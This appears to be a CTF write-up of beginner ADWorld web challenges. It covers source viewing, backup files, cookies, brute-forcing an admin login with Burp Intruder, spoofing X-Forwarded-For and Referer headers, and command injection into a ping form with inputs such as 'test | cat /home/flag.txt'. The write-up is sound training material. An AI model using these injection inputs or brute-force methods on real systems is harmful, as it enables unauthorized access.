Adworld Ctf Web Exercises

3 minute read

ADWorld CTF Web Excersise Area Writeups


ADWorld CTF is an online chinese competition that gives users a series of challenges in the categories of misc, pwn, web, reverse, crypto and mobile. Each category has 2 groups of challenges including the excersise area and the challenge area.



The name tells us to look at the source code. We cannot immediately click on the page to view source code so we add view-source: to the front of the url. The flag is commented out in the code.



Looking at robots.txt we see a php file named f1ag_1s_h3re.php. When we go to this file the flag is presented.



When we open the challenge the first page has index.php on it. We can assume we need the backup of this file. We are prompted with a download when we navigate to index.php.bak. This file can be opened in a text editor or using cat in a terminal and the flag is given to us.


When we open burp we can see a cookie in the header that says look-here=Cookie.php. When we go to this php file it says see the http response. In the response we can see the header named flag and the accompanying flag.



The front page gives us a button that says flag but we cannot click it. Looking in the source code we can see the button is disabled. Removing the word disabled allows us to click it and get the flag.



We are presented with a login page. When we try test:test we get a messsage saying please log in as admin. When we inspect the source code in this page it says maybe you need a dictionary. This tells us we will need to bruteforce a password.

To bruteforce passwords we will take the request and send it to intruder. This will allow us to send many requests at once with different values. In the positions tab we can set the username input as admin and click on the password input to add it as a payload position. In the payloads tab I clicked load list and found the common.lst in the wordlists file that comes on kali linux.

The bruteforcing takes a while as the community edition of burp throttles the number of requests you can make but eventually you will find the password 123456.



The title of this challenge leads us to XFF (X-Forwarded-For) which is used for identifying the origin of a client that is trying to connect to a web server. XFF is useful for accountability on the internet where the header can be used to link a request to your ip. If a web server was not using this header then they would only see requests originating from a proxy server instead of the actual client. This provides anonimity for anyone using the app and makes it more difficult to detect and prevent possible hackers.

The XFF header is useful for this challange as we are given an IP on the front page of the website that we can assume will need to be added in the header. The IP given is

Adding the header X-Forwarded-For with the value of into the request which brings us to a page that says

To get the flag we need add both the X-Forwarded-For header and a Referer header with the value



We are brought to a webpage that has a input box and a button to execute whatever is in the box. This is intended for a ping function where you can enter an IP and ping it. When we enter in the word “test” we can see the syntax for the command being executed. ping -c 3 test.

Testing the input further we can enter test | ls. This returns us with the file index.php. We now know any input can be made and we have access to their directories. Looking through each directory in the root folder we find something interesting in home. This was found with the input of test | ls /home. The directory has a flag.txt file in it which when opened with test | cat /home/flag.txt gives us the flag.